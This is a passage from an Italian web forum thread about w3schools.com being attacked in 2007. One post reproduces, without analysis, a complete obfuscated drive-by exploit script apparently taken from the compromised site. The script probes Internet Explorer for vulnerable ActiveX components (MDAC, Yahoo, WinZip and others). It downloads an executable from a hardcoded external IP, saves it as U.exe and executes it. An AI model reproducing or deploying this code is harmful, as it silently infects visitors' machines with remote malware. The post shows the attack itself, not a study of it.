Home Messaggi odierni FAQ Ricerca avanzata Lo staff del forum Regolamento Utenti Archivio

Visualizzazione dei risultati da 1 a 10 su 42

Discussione: www.w3schools.com "attaccato" [no tecnico]

Navigazione veloce Discussioni off-topic Vai in cima

Visualizzazione discussione

08-09-2007, 18:14 #6
andrea.paiola

Visualizza il profilo

Visualizza i messaggi forum

Messaggio privato

Vai alla Home Page
Utente di HTML.it

Registrato dal

Nov 2004

Messaggi

8,058
function sdk_exploit()
{
if (isMemory == false ) makeMemory();
var tmp = "\x0A\x0A\x0A\x0A";
var tmp_size = 1044;
while(tmp.length < (tmp_size * 2)) tmp += tmp;
tmp = tmp.substring(0, tmp_size);
sdk.SourceUrl = tmp;
location.reload();
}

function yahoo_exploit()
{
if (isMemory == false ) makeMemory();
var target = document.createElement("object");
target.setAttribute("classid", "clsid:9D39223E-AE8E-11D4-8FD3-00D0B7730277");
myBuff = '\x0a';
while (myBuff.length < 5000) myBuff += '\x0a\x0a\x0a\x0a';
eval(String.fromCharCode(116,97,114,103,101,116,46 ,115,101,114)+"ver = myBuff;");
eval("target"+"."+String.fromCharCode(114,101,99,1 01,105,118,101,40,41)+";");

}

function yahoo2_exploit()
{
if (isMemory == false ) makeMemory();

var target1 = document.createElement("object");
target1.setAttribute("classid", "CLSID:7EC7B6C5-25BD-4586-A641-D2ACBB6629DD");
var buffer = unescape("%0a0a");
while (buffer.length < 845) buffer+='\x0A';
while (buffer.length< 1000) buffer+=unescape("%u0a0a");
eval();

}

function winzip_exploit()
{
if (isMemory == false ) makeMemory();
var buf = String.fromCharCode(65);
while (buf.length < 512) buf+='\x09';
eval(String.fromCharCode(87,90,70,73,76,69,86,73,6 9,87,46,67,114,101,97,116,101,78,101,119,70,111,10 8,100,101,114,70,114,111,109,78,97,109,101,40,98,1 17,102,41,59));
}

function w2k_exploit()
{
exploit = "var xml = new Ac"+"tiv"+"eX"+"Object('Mic'+'ros'+'oft.X'+'ML"+"H TTP');";
exploit += "xml.Open('GET','http://66.246.72.200/exe.php',0);xml.Send();";
exploit += "var stream = new Ac"+"ti"+"veXO"+"bj"+"ect('AD"+"ODB.Stre"+"am');st ream.Mode = 3;";
exploit += "stream.Type = 1;stream.Open();stream.Write(xml.responseBody);str eam.SaveToFile('../U.exe',2); ";
payCode = escape(exploit);
pocCode = 'res://mmcndmgr.dll/pr'+'evsym12.htm#%29%3B%3C/style%3E%3Cscript%20lan'+'guage%3D%27js'+'cript%27 %3Ea%3Dnew%20ActiveXObject%28%27She'+'ll.App'+'lic ation%27%29%3B'+payCode+'a.Shel'+'lExec'+'ute%28%2 7../U.exe%27%29%3B%3C/sc'+'ript%3E%3C%21--//%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0';
document.location = pocCode;
}

function newRdsObject(o, n)
{
var r = null;
var ddd=null;
try { eval("r = o."+String.fromCharCode(67,114,101,97,116,101,79,9 8,106,101,99,116)+"(n)") }catch(e){}
if (! r) {try { eval("r = o."+String.fromCharCode(67,114,101,97,116,101)+dec ode64(String.fromCharCode(98,50,74,113,90,87,78,48 ))+"(n, \"\")") }catch(e){}}
if (! r) {try { eval("r = o."+String.fromCharCode(67,114,101,97,116,101)+dec ode64(String.fromCharCode(98,50,74,113,90,87,78,48 ))+"(n, \"\", \"\")") }catch(e){}}
if (! r) {try { eval("r = o."+String.fromCharCode(71,101,116)+decode64(Strin g.fromCharCode(98,50,74,113,90,87,78,48))+"(\"\", n)") }catch(e){}}
if (! r) {try { eval("r = o."+String.fromCharCode(71,101,116)+decode64(Strin g.fromCharCode(98,50,74,113,90,87,78,48))+"(n, \"\")") }catch(e){}}
if (! r) {try { eval("r = o."+String.fromCharCode(71,101,116)+decode64(Strin g.fromCharCode(98,50,74,113,90,87,78,48))+"(n)") }catch(e){}}
ddd=r;
return(ddd);
}
var mdk=0;
function Go(a)
{

var obj_exploit = newRdsObject(a,String.fromCharCode(109,115,120,109 ,108,50,46,88,77,76,72,84,84,80));
obj_exploit.open(String.fromCharCode(71,69,84),"ht tp://66.246.72.200/exe.php",false);
eval("obj_exploit"+decode64("LnNlbmQoKTs="));
var obj_adodb = newRdsObject(a,String.fromCharCode(97,100,111,100, 98,46,115,116,114,101,97,109));
obj_adodb.type = 1;
eval(decode64("b2JqX2Fkb2RiLm9wZW4oKTs="));
eval("obj_adodb"+".Write"+"("+decode64("b2JqX2V4cG xvaXQucmVzcG9uc2VCb2R5")+");");
var fn = "C:\\\\U.exe";
eval("obj_adodb"+"."+decode64("U2F2ZVRvRmlsZQ==")+ "(fn,2);");
var s = newRdsObject(a, decode64("U2hlbGwuQXBwbGljYXRpb24="));
try { s.ShellExecute(fn); mdk=1; } catch(e) { }

}

function makePayLoad()
{
var mdacPay = new Array(
String.fromCharCode(123,66,68,57,54,67,53,53,54,45 ,54,53,65,51,45,49,49,68,48,45,57,56,51,65,45,48,4 8,67,48,52,70,67,50,57,69,51,48,125),
String.fromCharCode(123,66,68,57,54,67,53,53,54,45 ,54,53,65,51,45,49,49,68,48,45,57,56,51,65,45,48,4 8,67,48,52,70,67,50,57,69,51,54,125),
String.fromCharCode(123,65,66,57,66,67,69,68,68,45 ,69,67,55,69,45,52,55,69,49,45,57,51,50,50,45,68,5 2,65,50,49,48,54,49,55,49,49,54,125),
String.fromCharCode(123,48,48,48,54,70,48,51,51,45 ,48,48,48,48,45,48,48,48,48,45,67,48,48,48,45,48,4 8,48,48,48,48,48,48,48,48,52,54,125),
String.fromCharCode(123,48,48,48,54,70,48,51,65,45 ,48,48,48,48,45,48,48,48,48,45,67,48,48,48,45,48,4 8,48,48,48,48,48,48,48,48,52,54,125),
String.fromCharCode(123,54,101,51,50,48,55,48,97,4 5,55,54,54,100,45,52,101,101,54,45,56,55,57,99,45, 100,99,49,102,97,57,49,100,50,102,99,51,125),
String.fromCharCode(123,54,52,49,52,53,49,50,66,45 ,66,57,55,56,45,52,53,49,68,45,65,48,68,56,45,70,6 7,70,68,70,51,51,69,56,51,51,67,125),
String.fromCharCode(123,55,70,53,66,55,70,54,51,45 ,70,48,54,70,45,52,51,51,49,45,56,65,50,54,45,51,5 1,57,69,48,51,67,48,65,69,51,68,125),
String.fromCharCode(123,48,54,55,50,51,69,48,57,45 ,70,52,67,50,45,52,51,99,56,45,56,51,53,56,45,48,5 7,70,67,68,49,68,66,48,55,54,54,125),
String.fromCharCode(123,54,51,57,70,55,50,53,70,45 ,49,66,50,68,45,52,56,51,49,45,65,57,70,68,45,56,5 5,52,56,52,55,54,56,50,48,49,48,125),
String.fromCharCode(123,66,65,48,49,56,53,57,57,45 ,49,68,66,51,45,52,52,102,57,45,56,51,66,52,45,52, 54,49,52,53,52,67,56,52,66,70,56,125),
String.fromCharCode(123,68,48,67,48,55,68,53,54,45 ,55,67,54,57,45,52,51,70,49,45,66,52,65,48,45,50,5 3,70,53,65,49,49,70,65,66,49,57,125),
String.fromCharCode(123,69,56,67,67,67,68,68,70,45 ,67,65,50,56,45,52,57,54,98,45,66,48,53,48,45,54,6 7,48,55,67,57,54,50,52,55,54,66,125),
String.fromCharCode(123,66,68,57,54,67,53,53,54,45 ,54,53,65,51,45,49,49,68,48,45,57,56,51,65,45,48,4 8,67,48,52,70,67,50,57,69,51,48,125),null);
return mdacPay;
}

function mdac_exploit()
{
var i = 0;
var mdacPay = makePayLoad();
while (mdacPay[i])
{
var a = null;
if (mdacPay[i].substring(0,1) == "{")
{
a = document.createElement(decode64(String.fromCharCod e(98,50,74,113,90,87,78,48)));
a.setAttribute(String.fromCharCode(99,108)+String. fromCharCode(98-1,115,115)+String.fromCharCode(102+3,100), String.fromCharCode(99,108)+ String.fromCharCode(115,105,100,58) + mdacPay[i].substring(1, mdacPay[i].length - 1));
}
else { try { a = eval("new A"+"ctive"+"XObject")(mdacPay[i]); } catch(e){}}

if (a)
{
try
{
var b = newRdsObject(a, decode64("U2hlbGwuQXBwbGljYXRpb24="));
if (b) { if (Go(a)) break;}
}
catch(e){}
}
i++;
}
if(mdk==0)
{
if ( iswzip || isqt || isya || isya2 ||issdk)
{

if (isya2) yahoo2_exploit();
if (isya) yahoo_exploit();
if (issdk) sdk_exploit();
if (iswzip) winzip_exploit();

}
setslice_exploit();
}
}

function testwzip()
{
iswzip = 0;
try { var wzip = eval("ne"+"w A"+"cti"+"ve"+"X"+"Obj"+"e"+"ct('WZFILEVIEW.'+'Fil eViewCtrl.61');"); iswzip = 1; }
catch(e){};
return iswzip;
}

var isMemory = false;
var interval = 3;
var exploit = 0;
var iswzip = testwzip();

var browser = testBrowser();
var system = getVersion();

if (browser == "MSIE" && system == "2K") w2k_exploit();

if (browser == "MSIE")
{
if (system == "2K") w2k_exploit();
else mdac_exploit();
if(mdk==0) document.location="http://google.com"
}
else
{

setTimeout('wmplayer_exploit();',interval * 500);
}

</script>

</html>

New year, new site
Rispondi quotando

Navigazione veloce Discussioni off-topic Vai in cima

« Discussione precedente | Prossima discussione »

Permessi di invio

Non puoi inserire discussioni
Non puoi inserire repliche
Non puoi inserire allegati
Non puoi modificare i tuoi messaggi

Il codice BB è attivo
Le smilie sono attive
Il codice [IMG] attivo
[VIDEO] code is disattivato
il codice HTML è disattivato

Regole del Forum

Powered by vBulletin® Version 4.2.1
Copyright © 2025 vBulletin Solutions, Inc. All rights reserved.